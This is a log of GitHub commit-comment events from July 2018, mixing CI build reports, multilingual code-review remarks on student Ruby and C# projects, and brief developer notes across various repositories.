{"id":"7998225576","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29787711,"position":null,"line":null,"path":null,"commit_id":"84926cd6457df04ce3826cd585a27cecf99291b3","created_at":"2018-07-21T07:51:11Z","updated_at":"2018-07-21T07:51:11Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2978 of 2983 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 2 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR big diffs.\n * 2 tests had: Table big diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 651\n * SEGFAULT: 1\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\nregression Test Summary\n * Passed: 641\n * Failed: 2\n\nZoneUnitarySystemTest Test Summary\n * Passed: 7\n * SEGFAULT: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-84926cd6457df04ce3826cd585a27cecf99291b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-84926cd6457df04ce3826cd585a27cecf99291b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.83%25-yellow.png)</a> \n"}},"created_at":"2018-07-21T07:51:11Z"}
{"id":"7998225663","type":"CommitCommentEvent","actor":{"login":"atobeclaq"},"repo":{"name":"atobeclaq/mia_f"},"payload":{"comment":{"id":29787712,"position":null,"line":null,"path":null,"commit_id":"487299cc2f746504e26a31f5f861fe1f7c280943","created_at":"2018-07-21T07:51:16Z","updated_at":"2018-07-21T07:51:16Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-21T07:51:16Z"}
{"id":"7998225933","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29787713,"position":null,"line":null,"path":null,"commit_id":"1e37395517408be5f0907bd4e738c9baf4eb1134","created_at":"2018-07-21T07:51:30Z","updated_at":"2018-07-21T07:51:30Z","author_association":"MEMBER","body":"@nlalonde I had to revert this in https://github.com/discourse/discourse/commit/9afc4cf8c1d7857d44d253e5f0fa3e4300459e93 because the tests are failing with `Error: Compile Error: user-summary-category-search is not a helper`"}},"created_at":"2018-07-21T07:51:30Z"}
{"id":"7998226040","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29787714,"position":43,"line":43,"path":"lesson2/6_shop.rb","commit_id":"047677d7d9e41fbaf3a97c04512cb56a98320c3d","created_at":"2018-07-21T07:51:38Z","updated_at":"2018-07-21T07:51:38Z","author_association":"NONE","body":"А где вот это? \r\n\r\n> Также вывести итоговую сумму за каждый товар.\r\n> Вычислить и вывести на экран итоговую сумму всех покупок в \"корзине\"."}},"created_at":"2018-07-21T07:51:38Z"}
{"id":"7998226614","type":"CommitCommentEvent","actor":{"login":"Sovent"},"repo":{"name":"dedalexij/MessageManager"},"payload":{"comment":{"id":29787716,"position":24,"line":24,"path":"MessageManager/MessageManagerLib/Application/MessageService.cs","commit_id":"f54ee75638ebbe50bc2187e4fe0ea2be43cd43ab","created_at":"2018-07-21T07:52:08Z","updated_at":"2018-07-21T07:52:08Z","author_association":"NONE","body":"не понимаю, чем обусловлено существование метода Send* в паре с методом Add*ToQueue. кажется, такие детали должны быть скрыты от клиента"}},"created_at":"2018-07-21T07:52:08Z"}
{"id":"7998227149","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"VitaliyLazebny/thinknetica1"},"payload":{"comment":{"id":29787717,"position":26,"line":26,"path":"lesson2/6_shop.rb","commit_id":"047677d7d9e41fbaf3a97c04512cb56a98320c3d","created_at":"2018-07-21T07:52:31Z","updated_at":"2018-07-21T07:52:31Z","author_association":"NONE","body":"вот тут nil не нужен, просто return итак возвращает nil"}},"created_at":"2018-07-21T07:52:31Z"}
{"id":"7998227707","type":"CommitCommentEvent","actor":{"login":"Sovent"},"repo":{"name":"dedalexij/MessageManager"},"payload":{"comment":{"id":29787719,"position":15,"line":15,"path":"MessageManager/MessageManagerLib/Domain/SMS.cs","commit_id":"f54ee75638ebbe50bc2187e4fe0ea2be43cd43ab","created_at":"2018-07-21T07:53:00Z","updated_at":"2018-07-21T07:53:00Z","author_association":"NONE","body":"в C# 6 можно убирать private set;"}},"created_at":"2018-07-21T07:53:00Z"}
{"id":"7998228131","type":"CommitCommentEvent","actor":{"login":"Beneboe"},"repo":{"name":"fbprogmbh/Audit-Test-Automation"},"payload":{"comment":{"id":29787720,"position":null,"line":null,"path":null,"commit_id":"aeb326640a99f6c68b175e9aff3daf0818e9e916","created_at":"2018-07-21T07:53:24Z","updated_at":"2018-07-21T07:53:24Z","author_association":"COLLABORATOR","body":"I don't see why both `select`s are necessary. With `GetCollection()` I get back a [ConfigurationElementCollection](https://msdn.microsoft.com/en-us/library/microsoft.web.administration.configurationelementcollection(v=vs.90).aspx). This means I get back a [ConfigurationElement](https://msdn.microsoft.com/en-us/library/microsoft.web.administration.configurationelement(v=vs.90).aspx) for each of my HTTP response headers. I can then access the properties with `Get-IISConfigAttributeValue` in the `where` script block. As I see it, `Get-IISConfigAttributeValue` is the best way to access attributes because it puts the elements in the correct type. If I try to read an enum attribute for example, accessing it with rawattributes would get me an int. Using  `Get-IISConfigAttributeValue` instead, gets me the name.\r\n\r\nUsing `$section.GetCollection(\"customHeaders\") | select rawattributes | select -ExpandProperty *`, I would get:\r\n\r\n```\r\nKey   Value\r\n---   -----\r\nname  X-Powered-By\r\nvalue ASP.NET\r\nname  Strict-Transport-Security\r\nvalue max-age=0\r\n```\r\n\r\nIf I then pipe this to a `where` with the same script block, I would get an error instead. "}},"created_at":"2018-07-21T07:53:24Z"}
{"id":"7998229188","type":"CommitCommentEvent","actor":{"login":"Sovent"},"repo":{"name":"dedalexij/MessageManager"},"payload":{"comment":{"id":29787722,"position":40,"line":40,"path":"MessageManager/MessageManagerLib/Infrastructure/EmailRepository.cs","commit_id":"f54ee75638ebbe50bc2187e4fe0ea2be43cd43ab","created_at":"2018-07-21T07:54:16Z","updated_at":"2018-07-21T07:54:16Z","author_association":"NONE","body":"если часто идёт доступ по id, то лучше использовать не List, а Dictionary"}},"created_at":"2018-07-21T07:54:16Z"}
{"id":"7998229942","type":"CommitCommentEvent","actor":{"login":"Heizmann"},"repo":{"name":"ultimate-pa/ultimate"},"payload":{"comment":{"id":29787723,"position":18,"line":51,"path":"trunk/source/Library-Automata/src/de/uni_freiburg/informatik/ultimate/automata/petrinet/IsEquivalent.java","commit_id":"4f9cda2f1993f44d50d384e0399314b6eb332211","created_at":"2018-07-21T07:54:59Z","updated_at":"2018-07-21T07:54:59Z","author_association":"MEMBER","body":"@schillic Thanks for the hint. Do you think we should add support for several IStateFactory to the AutomataScriptInterpreter or should we try to use always only one?"}},"created_at":"2018-07-21T07:54:59Z"}
{"id":"7998230203","type":"CommitCommentEvent","actor":{"login":"KillTheMule"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":29787724,"position":33,"line":51,"path":"runtime/lua/tycho/init.lua","commit_id":"92cd1930bb9b023f15de263c2d6155f8903999b4","created_at":"2018-07-21T07:55:13Z","updated_at":"2018-07-21T07:55:13Z","author_association":"CONTRIBUTOR","body":"Thank you! It was just ment as a quick way to see what was going on (which I still borked as you remember :D), but having it reliable might help when going further."}},"created_at":"2018-07-21T07:55:13Z"}
{"id":"7998231953","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29787725,"position":null,"line":null,"path":null,"commit_id":"84926cd6457df04ce3826cd585a27cecf99291b3","created_at":"2018-07-21T07:56:43Z","updated_at":"2018-07-21T07:56:43Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-84926cd6457df04ce3826cd585a27cecf99291b3-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-21T07:56:43Z"}
{"id":"7998232289","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29787726,"position":null,"line":null,"path":null,"commit_id":"6c04b6652ef3b0e61fa0f5151b24bab267dc1517","created_at":"2018-07-21T07:57:00Z","updated_at":"2018-07-21T07:57:00Z","author_association":"MEMBER","body":"Done in https://github.com/StylishThemes/GitHub-Dark/commit/ef548c347694d0a056fe7c0991900f6041490626."}},"created_at":"2018-07-21T07:57:00Z"}
{"id":"7998232771","type":"CommitCommentEvent","actor":{"login":"saipsa"},"repo":{"name":"EliasKotlyar/Xiaomi-Dafang-Hacks"},"payload":{"comment":{"id":29787727,"position":null,"line":null,"path":null,"commit_id":"a5efadc959af58b36fc0737c3128d5c4bbfc4e79","created_at":"2018-07-21T07:57:28Z","updated_at":"2018-07-21T07:57:28Z","author_association":"NONE","body":"Line 5 should be\r\n . ./common_functions.sh \r\n\r\nIt doesn't work at present."}},"created_at":"2018-07-21T07:57:28Z"}
{"id":"7998232843","type":"CommitCommentEvent","actor":{"login":"Heizmann"},"repo":{"name":"ultimate-pa/ultimate"},"payload":{"comment":{"id":29787728,"position":15,"line":87,"path":"trunk/source/TraceAbstraction/src/de/uni_freiburg/informatik/ultimate/plugins/generator/traceabstraction/interpolantautomata/builders/StraightLineInterpolantAutomatonBuilder.java","commit_id":"71425fa78ea5d0251f9c7ea3b1a4826a3846cde3","created_at":"2018-07-21T07:57:34Z","updated_at":"2018-07-21T07:57:34Z","author_association":"MEMBER","body":"It is always a good idea to add correct documentation. Especially under the assumption that we have unlimited time."}},"created_at":"2018-07-21T07:57:34Z"}
{"id":"7998233639","type":"CommitCommentEvent","actor":{"login":"JC1738"},"repo":{"name":"opentable/sous"},"payload":{"comment":{"id":29787730,"position":null,"line":null,"path":null,"commit_id":"c1ff89a9f56aaaa08f14aba7ee5676244e88eca6","created_at":"2018-07-21T07:58:14Z","updated_at":"2018-07-21T07:58:14Z","author_association":"MEMBER","body":"TeamCity Sous Support :: Sous Tests :: Smoke Tests Nightly (not exlude fail) [Build 51](https://teamcity.otenv.com/viewLog.html?buildId=8980651&buildTypeId=SousSupport_SousTests_SmokeTestsNightlyNotExludeFail) outcome was **SUCCESS**\nSummary: Tests passed: 50, ignored: 1 Build time: 00:13:08"}},"created_at":"2018-07-21T07:58:14Z"}
{"id":"7998235308","type":"CommitCommentEvent","actor":{"login":"rainede"},"repo":{"name":"eveningglow/BicycleGAN-pytorch"},"payload":{"comment":{"id":29787731,"position":null,"line":null,"path":null,"commit_id":"48e853ab08d0c88fb47f7e7f6b7ff1bad7fab2e4","created_at":"2018-07-21T07:59:48Z","updated_at":"2018-07-21T07:59:48Z","author_association":"NONE","body":"Added relative link for Advanced-BicycleGAN in README.md"}},"created_at":"2018-07-21T07:59:48Z"}
{"id":"7998235843","type":"CommitCommentEvent","actor":{"login":"parthbkgadoya"},"repo":{"name":"parthbkgadoya/Image-based-Human-Age-and-Gender-Estimation"},"payload":{"comment":{"id":29787734,"position":null,"line":null,"path":null,"commit_id":"2d9977cd4ad365ba7b7c946bce86ab924abf94e7","created_at":"2018-07-21T08:00:12Z","updated_at":"2018-07-21T08:00:12Z","author_association":"OWNER","body":"At max, I can give you algorithm:\n1. Create training and testing dataset.\n2. Give training data to BIF algorithm and it will give you feature vector.\n3. Now, give label of age and gender to each feature vector. Create\ndatapoints like this (feature_vector*(i), *age(*i*), *gender(*i*)*)\n4. Give this labelled dataset to KPLS algorithm. (MATLAB inbuilt function)\n5. KPLS will give coefficients of regression equation.\n6. Testing : Give testing images to BIF. It will give feature vector.\n7. Put values of feature vector into regression equation and predict age\nand gender (use thresholding here).\n8. Evaluate your model. Compute cost using true value against predicted\nvalue.\n\nAnd you are done. In case of further queries refer KPLS research papers,\nBIF research paper. Also try to understand dimensionality reduction.\n"}},"created_at":"2018-07-21T08:00:12Z"}
{"id":"7998238098","type":"CommitCommentEvent","actor":{"login":"maximeg"},"repo":{"name":"flow-typed/flow-typed"},"payload":{"comment":{"id":29787744,"position":20,"line":63,"path":"definitions/npm/react-redux_v5.x.x/flow_v0.63.0-/react-redux_v5.x.x.js","commit_id":"c5d8a135ce136817172c7d31e36225b223c09e17","created_at":"2018-07-21T08:02:04Z","updated_at":"2018-07-21T08:02:04Z","author_association":"CONTRIBUTOR","body":"It was just a name changes to match other cases, see line 33 & 58."}},"created_at":"2018-07-21T08:02:04Z"}
{"id":"7998238189","type":"CommitCommentEvent","actor":{"login":"rinka88"},"repo":{"name":"joomdev/Astroid-Framework"},"payload":{"comment":{"id":29787746,"position":43,"line":548,"path":"README.md","commit_id":"983ff3eb3c0092aa03671cc5d0077e846aa9499e","created_at":"2018-07-21T08:02:09Z","updated_at":"2018-07-21T08:02:09Z","author_association":"NONE","body":"Vk"}},"created_at":"2018-07-21T08:02:09Z"}
{"id":"7998240114","type":"CommitCommentEvent","actor":{"login":"SAwxl"},"repo":{"name":"SAwxl/Python"},"payload":{"comment":{"id":29787752,"position":null,"line":null,"path":null,"commit_id":"6d06f8cef1e62e9cd7228d0f8f9fde4c08e0fa45","created_at":"2018-07-21T08:03:50Z","updated_at":"2018-07-21T08:03:50Z","author_association":"OWNER","body":"获取网页内容"}},"created_at":"2018-07-21T08:03:50Z"}
{"id":"7998241529","type":"CommitCommentEvent","actor":{"login":"bananodroid"},"repo":{"name":"bananodroid/nanoNodeMonitor"},"payload":{"comment":{"id":29787757,"position":null,"line":null,"path":null,"commit_id":"4f0a715efb381eeea4b721e78d0b6e8a3a038b45","created_at":"2018-07-21T08:05:09Z","updated_at":"2018-07-21T08:05:09Z","author_association":"OWNER","body":"Base settings modified to Banano"}},"created_at":"2018-07-21T08:05:09Z"}
{"id":"7998242393","type":"CommitCommentEvent","actor":{"login":"Pranila"},"repo":{"name":"Pranila/wproject"},"payload":{"comment":{"id":29787759,"position":1,"line":1,"path":"README.md","commit_id":"65281d5b41926bd6e35ad8a9b72be47877b4ca3d","created_at":"2018-07-21T08:05:51Z","updated_at":"2018-07-21T08:05:51Z","author_association":"OWNER","body":"print(\"hello world\")\r\n"}},"created_at":"2018-07-21T08:05:51Z"}
{"id":"7998243532","type":"CommitCommentEvent","actor":{"login":"schillic"},"repo":{"name":"ultimate-pa/ultimate"},"payload":{"comment":{"id":29787763,"position":18,"line":51,"path":"trunk/source/Library-Automata/src/de/uni_freiburg/informatik/ultimate/automata/petrinet/IsEquivalent.java","commit_id":"4f9cda2f1993f44d50d384e0399314b6eb332211","created_at":"2018-07-21T08:06:54Z","updated_at":"2018-07-21T08:06:54Z","author_association":"MEMBER","body":"I do not have a clear opinion. Here are my thoughts:\r\nOn the one hand, having one state factory keeps the constructors short.\r\nOn the other hand, 1) it is a bit ugly in the code 2) having several state factories is more general (maybe you do not always have a single state factory that implements all required interfaces).\r\n\r\nI do not expect that the extension of the AutomataScriptInterpreter to pass the correct number of `StringFactory` objects automatically is complicated.\r\n\r\nIf you prefer to change it, I can have a look at it."}},"created_at":"2018-07-21T08:06:54Z"}
{"id":"7998244693","type":"CommitCommentEvent","actor":{"login":"Ashokm666"},"repo":{"name":"nateshmbhat/webbot"},"payload":{"comment":{"id":29787767,"position":null,"line":null,"path":null,"commit_id":"ce5ae8c1966a95e08cdf2788aa3fe498428915e4","created_at":"2018-07-21T08:08:06Z","updated_at":"2018-07-21T08:08:06Z","author_association":"NONE","body":"Hi, can you please share a demo video,on login in to the email with live ....."}},"created_at":"2018-07-21T08:08:06Z"}
{"id":"7998245833","type":"CommitCommentEvent","actor":{"login":"yajirobe"},"repo":{"name":"gomi-tech/MSE_312_MATLAB"},"payload":{"comment":{"id":29787768,"position":null,"line":null,"path":null,"commit_id":"9346bb1d23d647ac1a8a616ac0ae3c80f826de7d","created_at":"2018-07-21T08:09:10Z","updated_at":"2018-07-21T08:09:10Z","author_association":"CONTRIBUTOR","body":"need to add speed controller part"}},"created_at":"2018-07-21T08:09:10Z"}
{"id":"7998250784","type":"CommitCommentEvent","actor":{"login":"JunYoungMoon"},"repo":{"name":"JunYoungMoon/ERP"},"payload":{"comment":{"id":29787781,"position":null,"line":null,"path":null,"commit_id":"ed53c573e1123d56c2e38af4c0a03befa9a3f964","created_at":"2018-07-21T08:13:32Z","updated_at":"2018-07-21T08:13:32Z","author_association":"OWNER","body":"ERP"}},"created_at":"2018-07-21T08:13:32Z"}
{"id":"7998254633","type":"CommitCommentEvent","actor":{"login":"Suil3File"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29787792,"position":null,"line":null,"path":null,"commit_id":"4f47f62d8ea8e7d88cff6ae4b3523550c496a2a2","created_at":"2018-07-21T08:17:05Z","updated_at":"2018-07-21T08:17:05Z","author_association":"NONE","body":"4f47f62"}},"created_at":"2018-07-21T08:17:05Z"}
{"id":"7998268349","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29787825,"position":null,"line":null,"path":null,"commit_id":"84926cd6457df04ce3826cd585a27cecf99291b3","created_at":"2018-07-21T08:29:41Z","updated_at":"2018-07-21T08:29:41Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1693 of 1695 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 651\n * OTHER_FAULT: 1\n\nZoneUnitarySystemTest Test Summary\n * Passed: 7\n * OTHER_FAULT: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-84926cd6457df04ce3826cd585a27cecf99291b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-84926cd6457df04ce3826cd585a27cecf99291b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.88%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-84926cd6457df04ce3826cd585a27cecf99291b3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-39.79%25-green.png)</a>\n"}},"created_at":"2018-07-21T08:29:41Z"}
{"id":"7998269313","type":"CommitCommentEvent","actor":{"login":"Suil3File"},"repo":{"name":"kneath/kss"},"payload":{"comment":{"id":29787833,"position":null,"line":null,"path":null,"commit_id":"3dada406ca1a1a0ea161ef3463dd0f4d4e7b0b8e","created_at":"2018-07-21T08:30:27Z","updated_at":"2018-07-21T08:30:27Z","author_association":"NONE","body":"3dada40"}},"created_at":"2018-07-21T08:30:27Z"}
{"id":"7998269421","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29787834,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-21T08:30:32Z","updated_at":"2018-07-21T08:30:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-21T08:30:32Z"}
{"id":"7998270026","type":"CommitCommentEvent","actor":{"login":"rugk"},"repo":{"name":"PrivateBin/PrivateBin"},"payload":{"comment":{"id":29787835,"position":null,"line":null,"path":null,"commit_id":"3fecd0f2ce8c4fca72612287ccbb0f05d897b9df","created_at":"2018-07-21T08:31:03Z","updated_at":"2018-07-21T08:31:03Z","author_association":"MEMBER","body":"I don't know much about source maps, but these two lines do not hurt, do they?\r\nIt's just a thing we would have to remove any time we upgrade these."}},"created_at":"2018-07-21T08:31:03Z"}
{"id":"7998274921","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29787845,"position":null,"line":null,"path":null,"commit_id":"baceb8693d268c14bea7cdbe419d9d434f26c95c","created_at":"2018-07-21T08:35:20Z","updated_at":"2018-07-21T08:35:20Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-21T08:35:20Z"}
{"id":"7998276035","type":"CommitCommentEvent","actor":{"login":"neerajchouhan787"},"repo":{"name":"neerajchouhan787/hello-world"},"payload":{"comment":{"id":29787847,"position":5,"line":5,"path":"README.md","commit_id":"a6784236dab74451072998c9ee72c3b1143ca3ba","created_at":"2018-07-21T08:36:20Z","updated_at":"2018-07-21T08:36:20Z","author_association":"OWNER","body":"here "}},"created_at":"2018-07-21T08:36:20Z"}
{"id":"7998276367","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29787851,"position":17,"line":17,"path":"lesson_1/ideal_weigth.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-21T08:36:39Z","updated_at":"2018-07-21T08:36:39Z","author_association":"NONE","body":"Это не нормально, если не ругается rubocop это не значит что правильно. На самом деле у тебя происходит конвертация дважды, то есть метод to_i избыточен, поэтому его надо удалить. Про оптимизацию своего кода не стоит забывать"}},"created_at":"2018-07-21T08:36:39Z"}
{"id":"7998276389","type":"CommitCommentEvent","actor":{"login":"neerajchouhan787"},"repo":{"name":"neerajchouhan787/hello-world"},"payload":{"comment":{"id":29787852,"position":5,"line":5,"path":"README.md","commit_id":"a6784236dab74451072998c9ee72c3b1143ca3ba","created_at":"2018-07-21T08:36:40Z","updated_at":"2018-07-21T08:36:40Z","author_association":"OWNER","body":"ewd"}},"created_at":"2018-07-21T08:36:40Z"}
{"id":"7998277405","type":"CommitCommentEvent","actor":{"login":"Jimmeyy"},"repo":{"name":"Jimmeyy/Background-generator"},"payload":{"comment":{"id":29787853,"position":5,"line":11,"path":"index.html","commit_id":"59e537e8e49ed501826435a9fc5a8acdd99c8ea5","created_at":"2018-07-21T08:37:32Z","updated_at":"2018-07-21T08:37:32Z","author_association":"OWNER","body":"This is a nice change! Thanks!"}},"created_at":"2018-07-21T08:37:32Z"}
{"id":"7998277809","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29787859,"position":56,"line":56,"path":"lesson_1/right_triangle.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-21T08:37:55Z","updated_at":"2018-07-21T08:37:55Z","author_association":"NONE","body":"нет, этого не требуется, просто показал как можно решать задачу разными способами. Твой код тоже работоспособен (решает поставленную задачу), поэтому ничего переписывать не стоит"}},"created_at":"2018-07-21T08:37:55Z"}
{"id":"7998279673","type":"CommitCommentEvent","actor":{"login":"ubiyca5"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29787862,"position":17,"line":17,"path":"lesson_1/ideal_weigth.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-21T08:39:38Z","updated_at":"2018-07-21T08:39:38Z","author_association":"OWNER","body":"понял! удалил и  записал себе на заметку!"}},"created_at":"2018-07-21T08:39:38Z"}
{"id":"7998280753","type":"CommitCommentEvent","actor":{"login":"genofire"},"repo":{"name":"freifunk-ffm/gluon"},"payload":{"comment":{"id":29787865,"position":null,"line":null,"path":null,"commit_id":"ec7a08adc39218e81ecc5f5a8f628df0147b8984","created_at":"2018-07-21T08:40:24Z","updated_at":"2018-07-21T08:40:24Z","author_association":"NONE","body":"Broken - \r\n```\r\n08:50:04 Cloning into 'l3roamd-2018-06-22-87052d0e'...\r\n08:50:04 fatal: reference is not a tree: 87052d0e262e9cb2ebc975beb87279e5d7c89c59\r\n```"}},"created_at":"2018-07-21T08:40:24Z"}
{"id":"7998281008","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29787866,"position":30,"line":30,"path":"lesson_1/triangle_square.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-21T08:40:39Z","updated_at":"2018-07-21T08:40:39Z","author_association":"NONE","body":"Я понимаю что делает код) другое дело то, что используя такой подход в разработке, ты очень быстро запутаешься. Если у тебя будет 10 входных параметров? Поэтому лучше использовать именованные переменные. На следующих занятиях ты с этим столкнешься."}},"created_at":"2018-07-21T08:40:39Z"}
{"id":"7998282104","type":"CommitCommentEvent","actor":{"login":"ubiyca5"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29787871,"position":56,"line":56,"path":"lesson_1/right_triangle.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-21T08:41:40Z","updated_at":"2018-07-21T08:41:40Z","author_association":"OWNER","body":"понял. записал себе на заметку"}},"created_at":"2018-07-21T08:41:40Z"}
{"id":"7998283155","type":"CommitCommentEvent","actor":{"login":"Suil3File"},"repo":{"name":"chocolatey/chocolatey-package-requests"},"payload":{"comment":{"id":29787872,"position":20,"line":38,"path":"README.md","commit_id":"19970e6cf108bc61bc3bc8c5e012d0cd1d2106fb","created_at":"2018-07-21T08:42:35Z","updated_at":"2018-07-21T08:42:35Z","author_association":"NONE","body":"#19970e6"}},"created_at":"2018-07-21T08:42:35Z"}
{"id":"7998286581","type":"CommitCommentEvent","actor":{"login":"ubiyca5"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29787889,"position":30,"line":30,"path":"lesson_1/triangle_square.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-21T08:45:35Z","updated_at":"2018-07-21T08:45:35Z","author_association":"OWNER","body":"понял учту на будущее"}},"created_at":"2018-07-21T08:45:35Z"}
{"id":"7998290509","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29787892,"position":null,"line":null,"path":null,"commit_id":"d994ff3b2ce0310f3e45687dc81a7a4352fc19bf","created_at":"2018-07-21T08:48:44Z","updated_at":"2018-07-21T08:48:44Z","author_association":"COLLABORATOR","body":"Ok"}},"created_at":"2018-07-21T08:48:44Z"}
{"id":"7998292039","type":"CommitCommentEvent","actor":{"login":"saipsa"},"repo":{"name":"EliasKotlyar/Xiaomi-Dafang-Hacks"},"payload":{"comment":{"id":29787898,"position":null,"line":null,"path":null,"commit_id":"a5efadc959af58b36fc0737c3128d5c4bbfc4e79","created_at":"2018-07-21T08:50:02Z","updated_at":"2018-07-21T08:50:02Z","author_association":"NONE","body":"Yes you are right, it doesn't work. I just checked it by invoking detectionon.sh manually."}},"created_at":"2018-07-21T08:50:02Z"}
{"id":"7998293113","type":"CommitCommentEvent","actor":{"login":"dongqing065269"},"repo":{"name":"rahulkulhalli/SkinLegion"},"payload":{"comment":{"id":29787901,"position":null,"line":null,"path":null,"commit_id":"429884412115d14c514e1d25d8f3909dcfd50a19","created_at":"2018-07-21T08:51:02Z","updated_at":"2018-07-21T08:51:02Z","author_association":"NONE","body":"Hello ,Can you explain how to use each script and program, what is their order of use? Thanks!"}},"created_at":"2018-07-21T08:51:02Z"}
{"id":"7998293993","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29787903,"position":null,"line":null,"path":null,"commit_id":"d994ff3b2ce0310f3e45687dc81a7a4352fc19bf","created_at":"2018-07-21T08:51:51Z","updated_at":"2018-07-21T08:51:51Z","author_association":"COLLABORATOR","body":"Bei der Müllbeseitigung ist immer keiner vorhanden, obwohl der Scan reichlich anzeigt?"}},"created_at":"2018-07-21T08:51:51Z"}
{"id":"7998294937","type":"CommitCommentEvent","actor":{"login":"yagmuraktas"},"repo":{"name":"yagmuraktas/test"},"payload":{"comment":{"id":29787905,"position":null,"line":null,"path":null,"commit_id":"77e777ccb35261265c2c9a34fedb5807c04165cc","created_at":"2018-07-21T08:52:34Z","updated_at":"2018-07-21T08:52:34Z","author_association":"OWNER","body":"ASP.NET ile Yemek Sitesi"}},"created_at":"2018-07-21T08:52:34Z"}
